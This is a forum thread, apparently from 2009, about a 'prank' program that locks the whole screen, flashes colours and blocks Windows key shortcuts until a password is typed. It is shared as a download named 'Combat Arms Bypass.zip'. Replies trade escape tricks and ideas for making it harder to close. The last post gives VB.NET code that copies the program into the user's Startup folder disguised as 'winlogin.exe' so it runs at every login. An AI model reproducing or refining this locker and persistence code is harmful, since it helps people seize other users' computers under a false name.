I would try this, but I'm too suspicious you are lying about the password...
Details : This program takes over your full screen , and is on exit-able so far on Vista 64bit , and Basic Windows XP. The only way of closing is by typing in password ("MP123") or Restarting your computer , and if you want I can make it reload it self on startup! this program is extremly anoying and fun to fool your friends with.
note : it also flashes random colors! *Cough Pixie*
Picture :
Virus Scan : Combat Arms Bypass.zip MD5:92e923e7369a4422d5a190dbae42f5f4 - VirSCAN.org Scanners did not find malware!
I would try this, but I'm too suspicious you are lying about the password...
OMG so now I am a lier?
Yeah, I'm kinda suspicious, did you block Alt+tab? Oh yeah you did.
No, the password is safe. Good job.
BRB SEIZURE.
Last edited by Lolland; 12-01-2009 at 10:58 PM.
it basically blocks everything because its impossible to minimize
even by alttabing or pressing window thing
Alt Delete is blocked , and I can just make it re-open it self on startup or relog.
You can close it only with Alt-F4
Thanks,
Don Diablo
LOL, You forgot to block Alt - F4.
Ahaha..Good Job.Keep releasing here!
Yep Alt + F4 works. ^^
what about start + L, the switch user shortcut. you need to block that. because i can just switch over to another user and end the process. :P
hint: ctrl + shift + esc
I used to have a visual basic script that closes the procces last started i used to have that bindend to button on my keybord (somthing like ctrl + f12)
Last edited by Thats the way it is; 12-02-2009 at 12:36 PM.
Cause There ain't no rest for the wicked
ehh to put it into the startup folder is easy:
That copys ur program into the startup folder as winlogon.exe which makes it a non-killable processCode:If System.IO.File.Exists("C:\users\" & System.Environment.UserName & _ "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe") = False Then FileCopy(System.Windows.Forms.Application.ExecutablePath, "C:\users\" & System.Environment.UserName & _ "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe") End If
Last edited by Bombsaway707; 12-02-2009 at 02:48 PM.